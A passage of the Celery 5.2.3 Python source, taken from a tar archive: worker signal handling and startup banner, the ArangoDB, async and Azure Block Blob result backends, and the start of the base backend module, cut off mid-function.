EXTRA_INFO_FMT = """ [tasks] {tasks} """ def active_thread_count(): from threading import enumerate return sum(1 for t in enumerate() if not t.name.startswith('Dummy-')) def safe_say(msg): print(f'\n{msg}', file=sys.__stderr__, flush=True) class Worker(WorkController): """Worker as a program.""" def on_before_init(self, quiet=False, **kwargs): self.quiet = quiet trace.setup_worker_optimizations(self.app, self.hostname) # this signal can be used to set up configuration for # workers by name. signals.celeryd_init.send( sender=self.hostname, instance=self, conf=self.app.conf, options=kwargs, ) check_privileges(self.app.conf.accept_content) def on_after_init(self, purge=False, no_color=None, redirect_stdouts=None, redirect_stdouts_level=None, **kwargs): self.redirect_stdouts = self.app.either( 'worker_redirect_stdouts', redirect_stdouts) self.redirect_stdouts_level = self.app.either( 'worker_redirect_stdouts_level', redirect_stdouts_level) super().setup_defaults(**kwargs) self.purge = purge self.no_color = no_color self._isatty = isatty(sys.stdout) self.colored = self.app.log.colored( self.logfile, enabled=not no_color if no_color is not None else no_color ) def on_init_blueprint(self): self._custom_logging = self.setup_logging() # apply task execution optimizations # -- This will finalize the app! trace.setup_worker_optimizations(self.app, self.hostname) def on_start(self): app = self.app super().on_start() # this signal can be used to, for example, change queues after # the -Q option has been applied. signals.celeryd_after_setup.send( sender=self.hostname, instance=self, conf=app.conf, ) if self.purge: self.purge_messages() if not self.quiet: self.emit_banner() self.set_process_status('-active-') self.install_platform_tweaks(self) if not self._custom_logging and self.redirect_stdouts: app.log.redirect_stdouts(self.redirect_stdouts_level) # TODO: Remove the following code in Celery 6.0 # This qualifies as a hack for issue #6366. warn_deprecated = True config_source = app._config_source if isinstance(config_source, str): # Don't raise the warning when the settings originate from # django.conf:settings warn_deprecated = config_source.lower() not in [ 'django.conf:settings', ] if warn_deprecated: if app.conf.maybe_warn_deprecated_settings(): logger.warning( "Please run `celery upgrade settings path/to/settings.py` " "to avoid these warnings and to allow a smoother upgrade " "to Celery 6.0." ) def emit_banner(self): # Dump configuration to screen so we have some basic information # for when users sends bug reports. use_image = term.supports_images() if use_image: print(term.imgcat(static.logo())) print(safe_str(''.join([ str(self.colored.cyan( ' \n', self.startup_info(artlines=not use_image))), str(self.colored.reset(self.extra_info() or '')), ])), file=sys.__stdout__, flush=True) def on_consumer_ready(self, consumer): signals.worker_ready.send(sender=consumer) logger.info('%s ready.', safe_str(self.hostname)) def setup_logging(self, colorize=None): if colorize is None and self.no_color is not None: colorize = not self.no_color return self.app.log.setup( self.loglevel, self.logfile, redirect_stdouts=False, colorize=colorize, hostname=self.hostname, ) def purge_messages(self): with self.app.connection_for_write() as connection: count = self.app.control.purge(connection=connection) if count: # pragma: no cover print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True) def tasklist(self, include_builtins=True, sep='\n', int_='celery.'): return sep.join( f' . {task}' for task in sorted(self.app.tasks) if (not task.startswith(int_) if not include_builtins else task) ) def extra_info(self): if self.loglevel is None: return if self.loglevel <= logging.INFO: include_builtins = self.loglevel <= logging.DEBUG tasklist = self.tasklist(include_builtins=include_builtins) return EXTRA_INFO_FMT.format(tasks=tasklist) def startup_info(self, artlines=True): app = self.app concurrency = str(self.concurrency) appr = '{}:{:#x}'.format(app.main or '__main__', id(app)) if not isinstance(app.loader, AppLoader): loader = qualname(app.loader) if loader.startswith('celery.loaders'): # pragma: no cover loader = loader[14:] appr += f' ({loader})' if self.autoscale: max, min = self.autoscale concurrency = f'{{min={min}, max={max}}}' pool = self.pool_cls if not isinstance(pool, str): pool = pool.__module__ concurrency += f" ({pool.split('.')[-1]})" events = 'ON' if not self.task_events: events = 'OFF (enable -E to monitor tasks in this worker)' banner = BANNER.format( app=appr, hostname=safe_str(self.hostname), timestamp=datetime.now().replace(microsecond=0), version=VERSION_BANNER, conninfo=self.app.connection().as_uri(), results=self.app.backend.as_uri(), concurrency=concurrency, platform=safe_str(_platform.platform()), events=events, queues=app.amqp.queues.format(indent=0, indent_first=False), ).splitlines() # integrate the ASCII art. if artlines: for i, _ in enumerate(banner): try: banner[i] = ' '.join([ARTLINES[i], banner[i]]) except IndexError: banner[i] = ' ' * 16 + banner[i] return '\n'.join(banner) + '\n' def install_platform_tweaks(self, worker): """Install platform specific tweaks and workarounds.""" if self.app.IS_macOS: self.macOS_proxy_detection_workaround() # Install signal handler so SIGHUP restarts the worker. if not self._isatty: # only install HUP handler if detached from terminal, # so closing the terminal window doesn't restart the worker # into the background. if self.app.IS_macOS: # macOS can't exec from a process using threads. # See https://github.com/celery/celery/issues#issue/152 install_HUP_not_supported_handler(worker) else: install_worker_restart_handler(worker) install_worker_term_handler(worker) install_worker_term_hard_handler(worker) install_worker_int_handler(worker) install_cry_handler() install_rdb_handler() def macOS_proxy_detection_workaround(self): """See https://github.com/celery/celery/issues#issue/161.""" os.environ.setdefault('celery_dummy_proxy', 'set_by_celeryd') def set_process_status(self, info): return platforms.set_mp_process_title( 'celeryd', info=f'{info} ({platforms.strargv(sys.argv)})', hostname=self.hostname, ) def _shutdown_handler(worker, sig='TERM', how='Warm', exc=WorkerShutdown, callback=None, exitcode=EX_OK): def _handle_request(*args): with in_sighandler(): from celery.worker import state if current_process()._name == 'MainProcess': if callback: callback(worker) safe_say(f'worker: {how} shutdown (MainProcess)') signals.worker_shutting_down.send( sender=worker.hostname, sig=sig, how=how, exitcode=exitcode, ) if active_thread_count() > 1: setattr(state, {'Warm': 'should_stop', 'Cold': 'should_terminate'}[how], exitcode) else: raise exc(exitcode) _handle_request.__name__ = str(f'worker_{how}') platforms.signals[sig] = _handle_request if REMAP_SIGTERM == "SIGQUIT": install_worker_term_handler = partial( _shutdown_handler, sig='SIGTERM', how='Cold', exc=WorkerTerminate, exitcode=EX_FAILURE, ) else: install_worker_term_handler = partial( _shutdown_handler, sig='SIGTERM', how='Warm', exc=WorkerShutdown, ) if not is_jython: # pragma: no cover install_worker_term_hard_handler = partial( _shutdown_handler, sig='SIGQUIT', how='Cold', exc=WorkerTerminate, exitcode=EX_FAILURE, ) else: # pragma: no cover install_worker_term_handler = \ install_worker_term_hard_handler = lambda *a, **kw: None def on_SIGINT(worker): safe_say('worker: Hitting Ctrl+C again will terminate all running tasks!') install_worker_term_hard_handler(worker, sig='SIGINT') if not is_jython: # pragma: no cover install_worker_int_handler = partial( _shutdown_handler, sig='SIGINT', callback=on_SIGINT, exitcode=EX_FAILURE, ) else: # pragma: no cover def install_worker_int_handler(*args, **kwargs): pass def _reload_current_worker(): platforms.close_open_fds([ sys.__stdin__, sys.__stdout__, sys.__stderr__, ]) os.execv(sys.executable, [sys.executable] + sys.argv) def install_worker_restart_handler(worker, sig='SIGHUP'): def restart_worker_sig_handler(*args): """Signal handler restarting the current python program.""" set_in_sighandler(True) safe_say(f"Restarting celery worker ({' '.join(sys.argv)})") import atexit atexit.register(_reload_current_worker) from celery.worker import state state.should_stop = EX_OK platforms.signals[sig] = restart_worker_sig_handler def install_cry_handler(sig='SIGUSR1'): # PyPy does not have sys._current_frames if is_pypy: # pragma: no cover return def cry_handler(*args): """Signal handler logging the stack-trace of all active threads.""" with in_sighandler(): safe_say(cry()) platforms.signals[sig] = cry_handler def install_rdb_handler(envvar='CELERY_RDBSIG', sig='SIGUSR2'): # pragma: no cover def rdb_handler(*args): """Signal handler setting a rdb breakpoint at the current frame.""" with in_sighandler(): from celery.contrib.rdb import _frame, set_trace # gevent does not pass standard signal handler args frame = args[1] if args else _frame().f_back set_trace(frame) if os.environ.get(envvar): platforms.signals[sig] = rdb_handler def install_HUP_not_supported_handler(worker, sig='SIGHUP'): def warn_on_HUP_handler(signum, frame): with in_sighandler(): safe_say('{sig} not supported: Restarting with {sig} is ' 'unstable on this platform!'.format(sig=sig)) platforms.signals[sig] = warn_on_HUP_handler ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3997498 celery-5.2.3/celery/backends/0000775000175000017500000000000000000000000015732 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/__init__.py0000664000175000017500000000002700000000000020042 0ustar00asifasif00000000000000"""Result Backends.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/arangodb.py0000664000175000017500000001707100000000000020067 0ustar00asifasif00000000000000"""ArangoDb result store backend.""" # pylint: disable=W1202,W0703 import json import logging from datetime import timedelta from kombu.utils.objects import cached_property from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: from pyArango import connection as py_arango_connection from pyArango.theExceptions import AQLQueryError except ImportError: py_arango_connection = AQLQueryError = None __all__ = ('ArangoDbBackend',) class ArangoDbBackend(KeyValueStoreBackend): """ArangoDb backend. Sample url "arangodb://username:password@host:port/database/collection" *arangodb_backend_settings* is where the settings are present (in the app.conf) Settings should contain the host, port, username, password, database name, collection name else the default will be chosen. Default database name and collection name is celery. Raises ------ celery.exceptions.ImproperlyConfigured: if module :pypi:`pyArango` is not available. """ host = '127.0.0.1' port = '8529' database = 'celery' collection = 'celery' username = None password = None # protocol is not supported in backend url (http is taken as default) http_protocol = 'http' verify = False # Use str as arangodb key not bytes key_t = str def __init__(self, url=None, *args, **kwargs): """Parse the url or load the settings from settings object.""" super().__init__(*args, **kwargs) if py_arango_connection is None: raise ImproperlyConfigured( 'You need to install the pyArango library to use the ' 'ArangoDb backend.', ) self.url = url if url is None: host = port = database = collection = username = password = None else: ( _schema, host, port, username, password, database_collection, _query ) = _parse_url(url) if database_collection is None: database = collection = None else: database, collection = database_collection.split('/') config = self.app.conf.get('arangodb_backend_settings', None) if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'ArangoDb backend settings should be grouped in a dict', ) else: config = {} self.host = host or config.get('host', self.host) self.port = int(port or config.get('port', self.port)) self.http_protocol = config.get('http_protocol', self.http_protocol) self.verify = config.get('verify', self.verify) self.database = database or config.get('database', self.database) self.collection = \ collection or config.get('collection', self.collection) self.username = username or config.get('username', self.username) self.password = password or config.get('password', self.password) self.arangodb_url = "{http_protocol}://{host}:{port}".format( http_protocol=self.http_protocol, host=self.host, port=self.port ) self._connection = None @property def connection(self): """Connect to the arangodb server.""" if self._connection is None: self._connection = py_arango_connection.Connection( arangoURL=self.arangodb_url, username=self.username, password=self.password, verify=self.verify ) return self._connection @property def db(self): """Database Object to the given database.""" return self.connection[self.database] @cached_property def expires_delta(self): return timedelta(seconds=self.expires) def get(self, key): try: logging.debug( 'RETURN DOCUMENT("{collection}/{key}").task'.format( collection=self.collection, key=key ) ) query = self.db.AQLQuery( 'RETURN DOCUMENT("{collection}/{key}").task'.format( collection=self.collection, key=key ) ) result = query.response["result"][0] if result is None: return None return json.dumps(result) except AQLQueryError as aql_err: logging.error(aql_err) return None except Exception as err: logging.error(err) return None def set(self, key, value): """Insert a doc with value into task attribute and _key as key.""" try: logging.debug( 'INSERT {{ task: {task}, _key: "{key}" }} INTO {collection}' .format( collection=self.collection, key=key, task=value ) ) self.db.AQLQuery( 'INSERT {{ task: {task}, _key: "{key}" }} INTO {collection}' .format( collection=self.collection, key=key, task=value ) ) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) def mget(self, keys): try: json_keys = json.dumps(keys) logging.debug( """ FOR key in {keys} RETURN DOCUMENT(CONCAT("{collection}/", key).task """.format( collection=self.collection, keys=json_keys ) ) query = self.db.AQLQuery( """ FOR key in {keys} RETURN DOCUMENT(CONCAT("{collection}/", key).task """.format( collection=self.collection, keys=json_keys ) ) results = [] while True: results.extend(query.response['result']) query.nextBatch() except StopIteration: values = [ result if result is None else json.dumps(result) for result in results ] return values except AQLQueryError as aql_err: logging.error(aql_err) return [None] * len(keys) except Exception as err: logging.error(err) return [None] * len(keys) def delete(self, key): try: logging.debug( 'REMOVE {{ _key: "{key}" }} IN {collection}'.format( key=key, collection=self.collection ) ) self.db.AQLQuery( 'REMOVE {{ _key: "{key}" }} IN {collection}'.format( key=key, collection=self.collection ) ) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) def cleanup(self): """Delete expired meta-data.""" remove_before = (self.app.now() - self.expires_delta).isoformat() try: query = ( 'FOR item IN {collection} ' 'FILTER item.task.date_done < "{remove_before}" ' 'REMOVE item IN {collection}' ).format(collection=self.collection, remove_before=remove_before) logging.debug(query) self.db.AQLQuery(query) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/backends/asynchronous.py0000664000175000017500000002410500000000000021041 0ustar00asifasif00000000000000"""Async I/O backend support utilities.""" import socket import threading import time from collections import deque from queue import Empty from time import sleep from weakref import WeakKeyDictionary from kombu.utils.compat import detect_environment from celery import states from celery.exceptions import TimeoutError from celery.utils.threads import THREAD_TIMEOUT_MAX __all__ = ( 'AsyncBackendMixin', 'BaseResultConsumer', 'Drainer', 'register_drainer', ) drainers = {} def register_drainer(name): """Decorator used to register a new result drainer type.""" def _inner(cls): drainers[name] = cls return cls return _inner @register_drainer('default') class Drainer: """Result draining service.""" def __init__(self, result_consumer): self.result_consumer = result_consumer def start(self): pass def stop(self): pass def drain_events_until(self, p, timeout=None, interval=1, on_interval=None, wait=None): wait = wait or self.result_consumer.drain_events time_start = time.monotonic() while 1: # Total time spent may exceed a single call to wait() if timeout and time.monotonic() - time_start >= timeout: raise socket.timeout() try: yield self.wait_for(p, wait, timeout=interval) except socket.timeout: pass if on_interval: on_interval() if p.ready: # got event on the wanted channel. break def wait_for(self, p, wait, timeout=None): wait(timeout=timeout) class greenletDrainer(Drainer): spawn = None _g = None _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration def _create_drain_complete_event(self): """create new self._drain_complete_event object""" pass def _send_drain_complete_event(self): """raise self._drain_complete_event for wakeup .wait_for""" pass def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._started = threading.Event() self._stopped = threading.Event() self._shutdown = threading.Event() self._create_drain_complete_event() def run(self): self._started.set() while not self._stopped.is_set(): try: self.result_consumer.drain_events(timeout=1) self._send_drain_complete_event() self._create_drain_complete_event() except socket.timeout: pass self._shutdown.set() def start(self): if not self._started.is_set(): self._g = self.spawn(self.run) self._started.wait() def stop(self): self._stopped.set() self._send_drain_complete_event() self._shutdown.wait(THREAD_TIMEOUT_MAX) def wait_for(self, p, wait, timeout=None): self.start() if not p.ready: self._drain_complete_event.wait(timeout=timeout) @register_drainer('eventlet') class eventletDrainer(greenletDrainer): def spawn(self, func): from eventlet import sleep, spawn g = spawn(func) sleep(0) return g def _create_drain_complete_event(self): from eventlet.event import Event self._drain_complete_event = Event() def _send_drain_complete_event(self): self._drain_complete_event.send() @register_drainer('gevent') class geventDrainer(greenletDrainer): def spawn(self, func): import gevent g = gevent.spawn(func) gevent.sleep(0) return g def _create_drain_complete_event(self): from gevent.event import Event self._drain_complete_event = Event() def _send_drain_complete_event(self): self._drain_complete_event.set() self._create_drain_complete_event() class AsyncBackendMixin: """Mixin for backends that enables the async API.""" def _collect_into(self, result, bucket): self.result_consumer.buckets[result] = bucket def iter_native(self, result, no_ack=True, **kwargs): self._ensure_not_eager() results = result.results if not results: raise StopIteration() # we tell the result consumer to put consumed results # into these buckets. bucket = deque() for node in results: if not hasattr(node, '_cache'): bucket.append(node) elif node._cache: bucket.append(node) else: self._collect_into(node, bucket) for _ in self._wait_for_pending(result, no_ack=no_ack, **kwargs): while bucket: node = bucket.popleft() if not hasattr(node, '_cache'): yield node.id, node.children else: yield node.id, node._cache while bucket: node = bucket.popleft() yield node.id, node._cache def add_pending_result(self, result, weak=False, start_drainer=True): if start_drainer: self.result_consumer.drainer.start() try: self._maybe_resolve_from_buffer(result) except Empty: self._add_pending_result(result.id, result, weak=weak) return result def _maybe_resolve_from_buffer(self, result): result._maybe_set_cache(self._pending_messages.take(result.id)) def _add_pending_result(self, task_id, result, weak=False): concrete, weak_ = self._pending_results if task_id not in weak_ and result.id not in concrete: (weak_ if weak else concrete)[task_id] = result self.result_consumer.consume_from(task_id) def add_pending_results(self, results, weak=False): self.result_consumer.drainer.start() return [self.add_pending_result(result, weak=weak, start_drainer=False) for result in results] def remove_pending_result(self, result): self._remove_pending_result(result.id) self.on_result_fulfilled(result) return result def _remove_pending_result(self, task_id): for mapping in self._pending_results: mapping.pop(task_id, None) def on_result_fulfilled(self, result): self.result_consumer.cancel_for(result.id) def wait_for_pending(self, result, callback=None, propagate=True, **kwargs): self._ensure_not_eager() for _ in self._wait_for_pending(result, **kwargs): pass return result.maybe_throw(callback=callback, propagate=propagate) def _wait_for_pending(self, result, timeout=None, on_interval=None, on_message=None, **kwargs): return self.result_consumer._wait_for_pending( result, timeout=timeout, on_interval=on_interval, on_message=on_message, **kwargs ) @property def is_async(self): return True class BaseResultConsumer: """Manager responsible for consuming result messages.""" def __init__(self, backend, app, accept, pending_results, pending_messages): self.backend = backend self.app = app self.accept = accept self._pending_results = pending_results self._pending_messages = pending_messages self.on_message = None self.buckets = WeakKeyDictionary() self.drainer = drainers[detect_environment()](self) def start(self, initial_task_id, **kwargs): raise NotImplementedError() def stop(self): pass def drain_events(self, timeout=None): raise NotImplementedError() def consume_from(self, task_id): raise NotImplementedError() def cancel_for(self, task_id): raise NotImplementedError() def _after_fork(self): self.buckets.clear() self.buckets = WeakKeyDictionary() self.on_message = None self.on_after_fork() def on_after_fork(self): pass def drain_events_until(self, p, timeout=None, on_interval=None): return self.drainer.drain_events_until( p, timeout=timeout, on_interval=on_interval) def _wait_for_pending(self, result, timeout=None, on_interval=None, on_message=None, **kwargs): self.on_wait_for_pending(result, timeout=timeout, **kwargs) prev_on_m, self.on_message = self.on_message, on_message try: for _ in self.drain_events_until( result.on_ready, timeout=timeout, on_interval=on_interval): yield sleep(0) except socket.timeout: raise TimeoutError('The operation timed out.') finally: self.on_message = prev_on_m def on_wait_for_pending(self, result, timeout=None, **kwargs): pass def on_out_of_band_result(self, message): self.on_state_change(message.payload, message) def _get_pending_result(self, task_id): for mapping in self._pending_results: try: return mapping[task_id] except KeyError: pass raise KeyError(task_id) def on_state_change(self, meta, message): if self.on_message: self.on_message(meta) if meta['status'] in states.READY_STATES: task_id = meta['task_id'] try: result = self._get_pending_result(task_id) except KeyError: # send to buffer in case we received this result # before it was added to _pending_results. self._pending_messages.put(task_id, meta) else: result._maybe_set_cache(meta) buckets = self.buckets try: # remove bucket for this result, since it's fulfilled bucket = buckets.pop(result) except KeyError: pass else: # send to waiter via bucket bucket.append(result) sleep(0) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/azureblockblob.py0000664000175000017500000001206000000000000021303 0ustar00asifasif00000000000000"""The Azure Storage Block Blob backend for Celery.""" from kombu.utils import cached_property from kombu.utils.encoding import bytes_to_str from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import azure.storage.blob as azurestorage from azure.core.exceptions import (ResourceExistsError, ResourceNotFoundError) from azure.storage.blob import BlobServiceClient except ImportError: azurestorage = None __all__ = ("AzureBlockBlobBackend",) LOGGER = get_logger(__name__) AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://' class AzureBlockBlobBackend(KeyValueStoreBackend): """Azure Storage Block Blob backend for Celery.""" def __init__(self, url=None, container_name=None, *args, **kwargs): super().__init__(*args, **kwargs) if azurestorage is None or azurestorage.__version__ < '12': raise ImproperlyConfigured( "You need to install the azure-storage-blob v12 library to" "use the AzureBlockBlob backend") conf = self.app.conf self._connection_string = self._parse_url(url) self._container_name = ( container_name or conf["azureblockblob_container_name"]) self.base_path = conf.get('azureblockblob_base_path', '') self._connection_timeout = conf.get( 'azureblockblob_connection_timeout', 20 ) self._read_timeout = conf.get('azureblockblob_read_timeout', 120) @classmethod def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX): connection_string = url[len(prefix):] if not connection_string: raise ImproperlyConfigured("Invalid URL") return connection_string @cached_property def _blob_service_client(self): """Return the Azure Storage Blob service client. If this is the first call to the property, the client is created and the container is created if it doesn't yet exist. """ client = BlobServiceClient.from_connection_string( self._connection_string, connection_timeout=self._connection_timeout, read_timeout=self._read_timeout ) try: client.create_container(name=self._container_name) msg = f"Container created with name {self._container_name}." except ResourceExistsError: msg = f"Container with name {self._container_name} already." \ "exists. This will not be created." LOGGER.info(msg) return client def get(self, key): """Read the value stored at the given key. Args: key: The key for which to read the value. """ key = bytes_to_str(key) LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key) blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) try: return blob_client.download_blob().readall().decode() except ResourceNotFoundError: return None def set(self, key, value): """Store a value for a given key. Args: key: The key at which to store the value. value: The value to store. """ key = bytes_to_str(key) LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}") blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) blob_client.upload_blob(value, overwrite=True) def mget(self, keys): """Read all the values for the provided keys. Args: keys: The list of keys to read. """ return [self.get(key) for key in keys] def delete(self, key): """Delete the value at a given key. Args: key: The key of the value to delete. """ key = bytes_to_str(key) LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}") blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) blob_client.delete_blob() def as_uri(self, include_password=False): if include_password: return ( f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' f'{self._connection_string}' ) connection_string_parts = self._connection_string.split(';') account_key_prefix = 'AccountKey=' redacted_connection_string_parts = [ f'{account_key_prefix}**' if part.startswith(account_key_prefix) else part for part in connection_string_parts ] return ( f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' f'{";".join(redacted_connection_string_parts)}' ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/backends/base.py0000664000175000017500000012330700000000000017224 0ustar00asifasif00000000000000"""Result backend base classes. - :class:`BaseBackend` defines the interface. - :class:`KeyValueStoreBackend` is a common base class using K/V semantics like _get and _put. """ import sys import time import warnings from collections import namedtuple from datetime import datetime, timedelta from functools import partial from weakref import WeakValueDictionary from billiard.einfo import ExceptionInfo from kombu.serialization import dumps, loads, prepare_accept_content from kombu.serialization import registry as serializer_registry from kombu.utils.encoding import bytes_to_str, ensure_bytes from kombu.utils.url import maybe_sanitize_url import celery.exceptions from celery import current_app, group, maybe_signature, states from celery._state import get_current_task from celery.app.task import Context from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, ImproperlyConfigured, NotRegistered, SecurityError, TaskRevokedError, TimeoutError) from celery.result import (GroupResult, ResultBase, ResultSet, allow_join_result, result_from_tuple) from celery.utils.collections import BufferMap from celery.utils.functional import LRUCache, arity_greater from celery.utils.log import get_logger from celery.utils.serialization import (create_exception_cls, ensure_serializable, get_pickleable_exception, get_pickled_exception, raise_with_context) from celery.utils.time import get_exponential_backoff_interval __all__ = ('BaseBackend', 'KeyValueStoreBackend', 'DisabledBackend') EXCEPTION_ABLE_CODECS = frozenset({'pickle'}) logger = get_logger(__name__) MESSAGE_BUFFER_MAX = 8192 pending_results_t = namedtuple('pending_results_t', ( 'concrete', 'weak', )) E_NO_BACKEND = """ No result backend is configured. Please see the documentation for more information. """ E_CHORD_NO_BACKEND = """ Starting chords requires a result backend to be configured. Note that a group chained with a task is also upgraded to be a chord, as this pattern requires synchronization. Result backends that supports chords: Redis, Database, Memcached, and more. """ def unpickle_backend(cls, args, kwargs): """Return an unpickled backend.""" return cls(*args, app=current_app._get_current_object(), **kwargs) class _nulldict(dict): def ignore(self, *a, **kw): pass __setitem__ = update = setdefault = ignore def _is_request_ignore_result(request): if request is None: return False return request.ignore_result class Backend: READY_STATES = states.READY_STATES UNREADY_STATES = states.UNREADY_STATES EXCEPTION_STATES = states.EXCEPTION_STATES TimeoutError = TimeoutError #: Time to sleep between polling each individual item #: in `ResultSet.iterate`. as opposed to the `interval` #: argument which is for each pass. subpolling_interval = None #: If true the backend must implement :meth:`get_many`. supports_native_join = False #: If true the backend must automatically expire results. #: The daily backend_cleanup periodic task won't be triggered #: in this case. supports_autoexpire = False #: Set to true if the backend is persistent by default. persistent = True retry_policy = { 'max_retries': 20, 'interval_start': 0, 'interval_step': 1, 'interval_max': 1, } def __init__(self, app, serializer=None, max_cached_results=None, accept=None, expires=None, expires_type=None, url=None, **kwargs): self.app = app conf = self.app.conf self.serializer = serializer or conf.result_serializer (self.content_type, self.content_encoding, self.encoder) = serializer_registry._encoders[self.serializer] cmax = max_cached_results or conf.result_cache_max self._cache = _nulldict() if cmax == -1 else LRUCache(limit=cmax) self.expires = self.prepare_expires(expires, expires_type) # precedence: accept, conf.result_accept_content, conf.accept_content self.accept = conf.result_accept_content if accept is None else accept self.accept = conf.accept_content if self.accept is None else self.accept self.accept = prepare_accept_content(self.accept) self.always_retry = conf.get('result_backend_always_retry', False) self.max_sleep_between_retries_ms = conf.get('result_backend_max_sleep_between_retries_ms', 10000) self.base_sleep_between_retries_ms = conf.get('result_backend_base_sleep_between_retries_ms', 10) self.max_retries = conf.get('result_backend_max_retries', float("inf")) self._pending_results = pending_results_t({}, WeakValueDictionary()) self._pending_messages = BufferMap(MESSAGE_BUFFER_MAX) self.url = url def as_uri(self, include_password=False): """Return the backend as an URI, sanitizing the password or not.""" # when using maybe_sanitize_url(), "/" is added # we're stripping it for consistency if include_password: return self.url url = maybe_sanitize_url(self.url or '') return url[:-1] if url.endswith(':///') else url def mark_as_started(self, task_id, **meta): """Mark a task as started.""" return self.store_result(task_id, meta, states.STARTED) def mark_as_done(self, task_id, result, request=None, store_result=True, state=states.SUCCESS): """Mark task as successfully executed.""" if (store_result and not _is_request_ignore_result(request)): self.store_result(task_id, result, state, request=request) if request and request.chord: self.on_chord_part_return(request, state, result) def mark_as_failure(self, task_id, exc, traceback=None, request=None, store_result=True, call_errbacks=True, state=states.FAILURE): """Mark task as executed with failure.""" if store_result: self.store_result(task_id, exc, state, traceback=traceback, request=request) if request: # This task may be part of a chord if request.chord: self.on_chord_part_return(request, state, exc) # It might also have chained tasks which need to be propagated to, # this is most likely to be exclusive with being a direct part of a # chord but we'll handle both cases separately. # # The `chain_data` try block here is a bit tortured since we might # have non-iterable objects here in tests and it's easier this way. try: chain_data = iter(request.chain) except (AttributeError, TypeError): chain_data = tuple() for chain_elem in chain_data: # Reconstruct a `Context` object for the chained task which has # enough information to for backends to work with chain_elem_ctx = Context(chain_elem) chain_elem_ctx.update(chain_elem_ctx.options) chain_elem_ctx.id = chain_elem_ctx.options.get('task_id') chain_elem_ctx.group = chain_elem_ctx.options.get('group_id') # If the state should be propagated, we'll do so for all # elements of the chain. This is only truly important so # that the last chain element which controls completion of # the chain itself is marked as completed to avoid stalls. # # Some chained elements may be complex signatures and have no # task ID of their own, so we skip them hoping that not # descending through them is OK. If the last chain element is # complex, we assume it must have been uplifted to a chord by # the canvas code and therefore the condition below will ensure # that we mark something as being complete as avoid stalling. if ( store_result and state in states.PROPAGATE_STATES and chain_elem_ctx.task_id is not None ): self.store_result( chain_elem_ctx.task_id, exc, state, traceback=traceback, request=chain_elem_ctx, ) # If the chain element is a member of a chord, we also need # to call `on_chord_part_return()` as well to avoid stalls. if 'chord' in chain_elem_ctx.options: self.on_chord_part_return(chain_elem_ctx, state, exc) # And finally we'll fire any errbacks if call_errbacks and request.errbacks: self._call_task_errbacks(request, exc, traceback) def _call_task_errbacks(self, request, exc, traceback): old_signature = [] for errback in request.errbacks: errback = self.app.signature(errback) if not errback._app: # Ensure all signatures have an application errback._app = self.app try: if ( # Celery tasks type created with the @task decorator have # the __header__ property, but Celery task created from # Task class do not have this property. # That's why we have to check if this property exists # before checking is it partial function. hasattr(errback.type, '__header__') and # workaround to support tasks with bind=True executed as # link errors. Otherwise retries can't be used not isinstance(errback.type.__header__, partial) and arity_greater(errback.type.__header__, 1) ): errback(request, exc, traceback) else: old_signature.append(errback) except NotRegistered: # Task may not be present in this worker. # We simply send it forward for another worker to consume. # If the task is not registered there, the worker will raise # NotRegistered. old_signature.append(errback) if old_signature: # Previously errback was called as a task so we still # need to do so if the errback only takes a single task_id arg. task_id = request.id root_id = request.root_id or task_id g = group(old_signature, app=self.app) if self.app.conf.task_always_eager or request.delivery_info.get('is_eager', False): g.apply( (task_id,), parent_id=task_id, root_id=root_id ) else: g.apply_async( (task_id,), parent_id=task_id, root_id=root_id ) def mark_as_revoked(self, task_id, reason='', request=None, store_result=True, state=states.REVOKED): exc = TaskRevokedError(reason) if store_result: self.store_result(task_id, exc, state, traceback=None, request=request) if request and request.chord: self.on_chord_part_return(request, state, exc) def mark_as_retry(self, task_id, exc, traceback=None, request=None, store_result=True, state=states.RETRY): """Mark task as being retries. Note: Stores the current exception (if any). """ return self.store_result(task_id, exc, state, traceback=traceback, request=request) def chord_error_from_stack(self, callback, exc=None): app = self.app try: backend = app._tasks[callback.task].backend except KeyError: backend = self # We have to make a fake request since either the callback failed or # we're pretending it did since we don't have information about the # chord part(s) which failed. This request is constructed as a best # effort for new style errbacks and may be slightly misleading about # what really went wrong, but at least we call them! fake_request = Context({ "id": callback.options.get("task_id"), "errbacks": callback.options.get("link_error", []), "delivery_info": dict(), **callback }) try: self._call_task_errbacks(fake_request, exc, None) except Exception as eb_exc: # pylint: disable=broad-except return backend.fail_from_current_stack(callback.id, exc=eb_exc) else: return backend.fail_from_current_stack(callback.id, exc=exc) def fail_from_current_stack(self, task_id, exc=None): type_, real_exc, tb = sys.exc_info() try: exc = real_exc if exc is None else 